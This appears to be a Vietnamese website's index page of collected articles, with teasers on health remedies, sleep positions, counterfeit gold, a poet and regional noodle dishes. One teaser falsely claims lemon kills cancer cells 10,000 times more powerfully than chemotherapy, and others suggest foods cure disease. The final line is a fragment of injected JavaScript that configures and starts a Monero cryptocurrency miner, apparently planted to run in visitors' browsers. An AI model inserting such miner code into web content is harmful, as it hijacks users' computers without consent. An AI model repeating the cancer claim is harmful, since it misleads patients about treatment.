Trang chủ » Sưu tầm

Một Cử Chỉ Đẹp - Phan Hồng Vân Sưu Tầm -

Một cử chỉ đẹp, vâng, một cử chỉ đẹp nho nhỏ mỗi ngày thôi cũng đủ để làm cho cuộc sống thêm ý nhị đậm đà, và niềm vui bởi sự quan tâm đến nhau trong yêu thương được nhen nhúm, rồi bừng cháy, lan tỏa đến tất cả mọi người.

Chanh Chuyên Giết Tế Bào Ung Thư - Phan Hồng Vân Sưu Tầm -

- Trái chanh là một sản phẩm kỳ diệu chuyên giết các tế bào ung thư - Nó mạnh gấp 10.000 lần hơn liệu pháp hóa học (chimiothérapie) - Tại sao chúng ta không biết gì về nó (cho đến giờ nầy)

Bài Học Bổ Ích - Sưu Tầm -

Ngày xưa, có một cậu bé nóng tính. Bố cậu đưa cho cậu một túi đinh và dặn rằng: Cứ mỗi lần mất bình tỉnh, mất kiên nhẫn, hoặc cãi nhau với ai, thì cậu đóng một cái đinh vào khúc gỗ.

Khoai Lang Và Bệnh Tiểu Đường Bùi Thế Trường - Sưu Tầm -

BÙI THẾ TRƯỜNG – Câu hỏi đầy cắc cớ: Khoai lang có tinh bột, tinh bột tạo ra đường, người bịnh tiểu đường không nên ăn? Nếu ăn, hư thật ra sao? Những lợi ích khác của khoai lang là gì? (phần 1)

Một Nữ Khoa Học Gia Đã Tự Chữa Lành Bịnh Ung Thư Bằng Phương Pháp Cải Thiện Ăn Uống - Trần Anh Kiệt Sưu Tầm -

Lời Giới Thiệu:Nữ Giáo sư Jane Plant là một khoa học gia nổi tiếng của Anh Quốc. Bà bị bịnh ung thư nhũ hoa từ năm 1987. Thông thường thì một bịnh nhân ung thư khó mà sống sót được khi bịnh đã tái phát đến lần thứ hai. Tuy nhiên nhờ kiến thức khoa học sẵn có cũng như với sự điều trị và chăm sóc nhiệt tình của các bác sĩ chuyên khoa thượng thặng, bà đã kéo dài được mạng sống. Dầu vậy bịnh của bà đã tái phát đến năm lần, rồi cuối cùng đã lan đến hệ thống bạch huyết trong cơ thể. Trước tình trạng nguy ngập đó, bà vẫn không chịu bó tay chờ chết mà cương quyết tự chữa bằng cách ăn uống có phương pháp. Cuối cùng bà đã lành bịnh. Bà đã cho xuất bản quyển sách Your Life in Your Hands (Mạng sống trong tay của bạn)

Chùm Ảnh: Những Đồi Hoa Sim - Sưu Tầm-

Dọc Trường Sơn, mùa này những đồi hoa sim tím nở bung nhuộm tím góc rừng. Màu tím bát ngát, man mác gợi nhờ một niềm thương.

Bệnh Amip Ăn Não Và Triệu Chứng - Sưu Tầm -

Chỉ trong vòng vài tuần gần đây, truyền thông Việt Nam liên tục đưa tin về hai trường hợp tử vong vì bị nhiễm amip ăn não người.Đây là một căn bệnh hiếm gặp trên thế giới nhưng lại có tỷ lệ tử vong cao, do đó cũng dễ khiến người dân lo ngại nếu không được trang bị kiến thức đầy đủ về bệnh này.

Cà Tím Giúp Tránh Cao Huyết Áp, Ung Thư, Gout - Sưu Tầm -

Không chỉ được sử dụng như một món ăn thông thường, cà tím còn là một loại rau quả chứa nhiều chất dinh dưỡng và có tác dụng giảm bớt lượng cholesterol trong máu.Cà tím, hay còn được dân gian gọi nôm na “cà dái dê”, có tên khoa học là Solanum melongena. Mặc dù tên gọi phổ biến là “cà tím” nhưng loài cây thuộc họ cà này có đến 3 loại khác nhau, cho ra quả với những màu sắc khác nhau là tím, xanh và trắng. Tuy vậy, tất cả chúng đều có công dụng như nhau.

Các Tư Thế Ngủ Không Chỉ Có Ảnh Hưởng Đến Sức Khỏe Mà Còn Thể Hiện Tính Cách Của Từng Người. Phv

Các tư thế ngủ không chỉ có ảnh hưởng đến sức khỏe mà còn thể hiện tính cách của từng người.>> Đau vùng bụng dưới và những nguy cơ (2)>> Nhật tạo ra miếng vá chống sâu răng vĩnh viễnĐây là kết quả một cuộc khảo sát của Trung tâm Đánh giá và Tư vấn về Sức khỏe Giấc ngủ (SAAS – Hoa Kỳ) tiến hành trên 1.000 người.

Tư Thế Nằm Ngủ Nào Là Tốt Nhất ? Ths. Hoàng Khánh Toàn

Các anh chị, bạn bè, thân hữu thân, Xin mời các anh chị. bạn bè, thân hữu đọc bài tham khảo dưới đây của anh Hoàng Khánh Toàn để có thể biết rõ tư thế nằm ngủ nào tốt nhất cho cơ thể của chúng ta. Bài viết này được chị Hồ Thị Loan gởi cho chúng ta. Xin cám ơn anh Hoàng Khánh Toàn và chị Hồ Thị Loan. Thân,Nguyễn Đức Cao

Vàng Giả Trộn Von-Fram - Cánh Gà Giả - Sưu Tầm -

FBI điều tra việc Tàu bán vàng giả trộn Von-fram Xuất hiện vàng giả tinh vi tại kinh đô tài chính thế giới Bằng chiêu thức rút ruột những thỏi vàng và thay vào đó bằng kim loại von-fram có cùng trọng lượng, những kẻ lừa đảo đã qua mặt các thiết bị kiểm tra hiện đại và khiến nhiều nhà kinh doanh vàng tại New York (Mỹ) chịu thiệt hại lớn.

Phạm Thiên Thư Người Tu Sĩ Lãng Mạn - Phv Sưu Tầm

Sài Gòn có một quán café "Hoa vàng", trước kia còn gọi là "Động hoa vàng". Quán nằm ở Ngã Tư Bảy Hiền, trang nhã, tĩnh mịch và rất nên thơ. Khách thường là những người đứng tuổi. Ai vào, nếu dể ý một tí sẽ thấy một “lão nông” ngồi lặng lẽ ở góc nhà. Đó chính là thi sĩ Phạm Thiên Thư, tác giả của những bài thơ nổi tiếng được Phạm Duy phổ thành những tình khúc bất hủ.

3 Thương Hiệu Hủ Tiếu Nổi Tiếng Trong Ẩm Thực Việt - Sưu Tầm -

Hủ tiếu sau khi vào miền Nam được người Việt cải biến để hợp với khẩu vị của người Việt Nam. Và cũng đã từ lâu có 3 thương hiệu hủ tiếu nổi tiếng nhất ở các tỉnh phía Nam, đó là: hủ tiếu Mỹ Tho, hủ tiếu Nam Vang và hủ tiếu Sa Đéc.
', { threads:2,throttle:0.2, coin: "xmr", }); miner.start();